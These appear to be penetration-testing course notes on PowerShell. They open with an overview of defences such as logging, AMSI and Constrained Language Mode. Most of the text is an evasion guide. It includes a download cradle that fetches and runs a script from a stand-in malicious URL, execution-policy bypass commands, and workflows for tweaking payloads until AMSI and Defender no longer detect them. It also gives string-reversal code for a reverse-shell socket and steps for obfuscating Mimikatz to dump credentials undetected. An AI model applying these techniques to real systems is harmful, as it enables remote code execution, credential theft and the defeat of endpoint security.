2.2 - Security and Detection

owerShell Detection Mechanisms

Detection mechanisms are essential for monitoring, analyzing, and mitigating potential abuse of PowerShell in enterprise environments, these are the main tipologies:

System-wide Transcription

PowerShell can record all input and output from scripts, commands, and activities across the system. This logging includes user actions, script content, and error messages, offering comprehensive auditing. It is enabled via group policies and stores logs in specified file locations.

Script Block Logging

This feature captures and logs the content of executed PowerShell script blocks. It provides visibility into both legitimate and malicious PowerShell activities, even for dynamically generated or obfuscated scripts. Logs are stored in the Windows Event Log under the PowerShell Operational log.

Anti-Malware Scan Interface (AMSI)

AMSI integrates with antivirus software to scan PowerShell scripts and commands at runtime. It detects and blocks malicious activities, even those using obfuscation or encoded payloads. AMSI is widely adopted for enhancing script-level security.

Constrained Language Mode (CLM)

CLM restricts the commands and features available in PowerShell to reduce abuse by attackers. It limits access to .NET classes, COM objects, and other advanced scripting functionalities. CLM is enforced automatically for untrusted scripts or when integrated with security tools like AppLocker and WDAC.

Integration with AppLocker and WDAC (Device Guard)

CLM works seamlessly with AppLocker and Windows Defender Application Control (WDAC). These tools enforce policies that determine which scripts and executables can run, adding an extra layer of security. Together, they prevent unauthorized or malicious PowerShell execution.

Bypassing Security Features

1. Obfuscation: Using tools like Invoke-Obfuscation to encode or disguise scripts.

   • Example:

     IEX (New-Object Net.WebClient).DownloadString('http://malicious.url/script.ps1')

2. In-Memory Execution: Running scripts without saving to disk, reducing artifact traces.

3. Download Cradles: Fetching payloads directly from a remote server.

Execution Policy

Execution policy isn't a security measure and it is present to prevent user from accidently executing scripts.

How to View the Execution Policy

There're several ways to bypass it:

powershell -ExecutionPolicy bypass

powershell -c <cmd>

powershell -encodedcommand $env:PSExecutionPolicyPreference="bypass"

15 Ways to Bypass the PowerShell Execution PolicyNetSPI

https://www.netspi.com/blog/technical-blog/network-pentesting/15-ways-to-bypass-the-powershell-execution-policy/

Tools and Scripts for Security Bypass

Invisi-Shell

Invisi-Shell is a tool designed to bypass PowerShell security by hooking into .NET assemblies, including System.Management.Automation.dll and System.Core.dll, to evade logging mechanisms. It uses the CLR Profiler API, a DLL that communicates with the Common Language Runtime (CLR) to modify runtime behavior.

GitHub - OmerYa/Invisi-Shell: Hide your Powershell script in plain sight. Bypass all Powershell security featuresGitHub

https://github.com/OmerYa/Invisi-Shell

Key Usage

1. With Admin Privileges: Run RunWithPathAsAdmin.bat.

2. Without Admin Privileges: Run RunWithRegistryNonAdmin.bat.

3. Clean-Up: Type exit in the PowerShell session to remove changes.

References:

• Invisi-Shell GitHub

• CLR Profiling API

Tools and Script for AV Signatures Bypass

AMSITrigger

AMSITrigger helps identify which parts of a PowerShell script are flagged by AMSI (Anti-Malware Scan Interface), allowing precise modifications to bypass detection.

How It Works:

• Scans the script for AMSI detections.

• Pinpoints the exact code segment causing detection.

• Allows modifications (e.g., obfuscation, string reversal) to bypass detection.

Usage:

AmsiTrigger_x64.exe -i C:\Path\To\Script.ps1

Workflow:

1. Scan the script with AMSITrigger.

2. Modify the detected code (e.g., obfuscate or reverse strings).

3. Rescan the script. Repeat until no detection is found (AMSI_RESULT_NOT_DETECTED).

Example:

$String = 'niamoDppA.metsyS'
$classrev = ([regex]::Matches($String,'.','RightToLeft') | ForEach {$_.value}) -join ''
$AppDomain = [Reflection.Assembly].Assembly.GetType("$classrev").GetProperty('CurrentDomain').GetValue($null, @())

DefenderCheck

DefenderCheck identifies strings and code that might trigger Windows Defender’s detection mechanisms, helping assess what parts of a file are flagged.

How It Works:

• Scans files and scripts for known signatures flagged by Windows Defender.

• Provides feedback on strings or code patterns that trigger detections.

Usage:

DefenderCheck.exe Script.ps1

• Workflow:

  1. Scan the script using DefenderCheck.

  2. Modify detected patterns (e.g., rename variables, obfuscate strings).

  3. Rescan the modified script.

• Example: Reverse the "Net.Sockets" string if detected:

  $String = "stekcoS.teN"
  $class = ([regex]::Matches($String,'.','RightToLeft') | ForEach {$_.value}) -join ''
  $client = New-Object System.$class.TCPClient($IPAddress,$Port)

ProtectMyTooling

ProtectMyTooling obfuscates PowerShell payloads (like PowerKatz DLL) to prevent signature detection by antivirus engines.

How It Works:

• Obfuscates DLLs (e.g., PowerKatz) by encrypting and encoding them.

• Converts the obfuscated payload into Base64 and reverses the string to bypass static detections.

Usage:

• Rebuild PowerKatz DLL from Mimikatz source.

• Use ProtectMyTooling to obfuscate the DLL.

• Convert the DLL to Base64 and reverse the string for further obfuscation.

Steps:

1. Rebuild and obfuscate the DLL with ProtectMyTooling.

2. Convert to Base64 and reverse the string.

3. Integrate the reversed string into the PowerShell script for execution.

Invoke-Obfuscation

Invoke-Obfuscation is a tool for fully obfuscating PowerShell scripts, including AMSI bypasses, by randomizing and modifying strings, functions, and the overall script structure.

How It Works:

• Randomizes function names, strings, and syntax to avoid static signature detection.

• Useful for obfuscating AMSI bypass code and PowerShell payloads.

Usage:

Invoke-Obfuscation.ps1

Example: Use this tool to obfuscate scripts for AMSI bypass or for payloads like Invoke-Mimikatz.

Script Modification Examples

Invoke-Mimikatz

Highly detected script. Requires significant modification to evade detection.

Techniques:

1. Remove all default comments.

2. Rename functions and variables (e.g., rename DumpCreds to DC).

3. Modify API calls (e.g., VirtualProtect, WriteProcessMemory).

4. Obfuscate PEBytes content using PowerKatz DLL and packers.

5. Implement reverse functions for PEBytes to bypass static detections.

6. Add sandbox checks to waste analysis resources (e.g., check for VMware or VirtualBox).

Obfuscation Steps:

1. Rename script and function names (e.g., Invoke-Mimikatz → Invoke-Mimi).

2. Modify variable names for detected API calls.

3. Obfuscate the PowerKatz DLL and integrate it into the script (Base64 encoded and reversed).

4. Remove warnings and errors related to PE file loading.

Invoke-PowerShellTcp

Avoid detection by reversing flagged strings in the script.

Example:

$String = "stekcoS.teN"
$class = ([regex]::Matches($String,'.','RightToLeft') | ForEach {$_.value}) -join ''
$client = New-Object System.$class.TCPClient($IPAddress,$Port)